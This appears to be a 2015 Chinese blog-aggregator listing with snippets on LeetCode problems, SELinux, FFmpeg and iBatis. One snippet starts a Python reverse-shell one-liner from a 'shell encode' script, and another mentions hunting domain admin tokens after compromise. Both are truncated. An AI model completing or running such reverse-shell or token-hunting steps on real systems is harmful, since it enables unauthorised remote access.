题目链接:https://icpcarchive.ecs.baylor.edu/index.php?option=com_onlinejudge&Itemid=8&page=show_problem&problem=4156题目拷贝难度大我就不复制了。题目大意:维护一个字符串,要求支持插入、删除操作...
分类:
其他好文 时间:
2015-02-03 00:29:14
阅读次数:
283
CentOS 6solution: chcon -t httpd_sys_content_t -R /directoryrefer to: https://www.centos.org/forums/viewtopic.php?f=19&t=15128&start=10#p70999
分类:
数据库 时间:
2015-02-03 00:27:03
阅读次数:
216
题目链接:https://oj.leetcode.com/problems/binary-tree-postorder-traversal/
题目:
Given a binary tree, return the postorder traversal of its nodes' values.
For example:
Given binary tree {1,#,2,3},
...
分类:
其他好文 时间:
2015-02-02 23:22:05
阅读次数:
312
题目链接:https://oj.leetcode.com/problems/binary-tree-preorder-traversal/
题目:
Given a binary tree, return the preorder traversal of its nodes' values.
For example:
Given binary tree {1,#,2,3},
...
分类:
其他好文 时间:
2015-02-02 23:21:43
阅读次数:
327
题目链接:https://oj.leetcode.com/problems/binary-tree-inorder-traversal/
题目:
Given a binary tree, return the inorder traversal of its nodes' values.
For example:
Given binary tree {1,#,2,3},
...
分类:
其他好文 时间:
2015-02-02 23:21:23
阅读次数:
294
1.FFmpeg build for android random architectures with example jni
https://github.com/appunite/AndroidFFmpeg
2.ijkplayer - Android/iOS 基于FFMPEG库的播放器
http://git.oschina.net/bbcallen/ijkplayer
git下载...
分类:
其他好文 时间:
2015-02-02 23:18:45
阅读次数:
290
https://ibatis.apache.org/docs/dotnet/datamapper/ch03s09.html3.9.Dynamic SQLA very common problem with working directly with ADO is dynamic SQL. It is...
分类:
数据库 时间:
2015-02-02 22:51:44
阅读次数:
355
link:https://oj.leetcode.com/problems/two-sum/
描述:
Given an array of integers, find two numbers such that they add up to a specific target number.
The function twoSum should return indices of...
分类:
其他好文 时间:
2015-02-02 21:33:09
阅读次数:
138
地址:https://github.com/donghouhe/python_fantan_shell_encode/blob/master/netcat_encode.py 如果你觉得可以,点个star鼓励一下
这是原始的一句命令
1
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF...
分类:
编程语言 时间:
2015-02-02 21:29:49
阅读次数:
563
source: https://www.trustedsec.com/january-2015/account-hunting-invoke-tokenmanipulation/
I’ve been searching quite a while now for the best way to search for domain admin tokens, once admin righ...
分类:
其他好文 时间:
2015-02-02 19:55:40
阅读次数:
283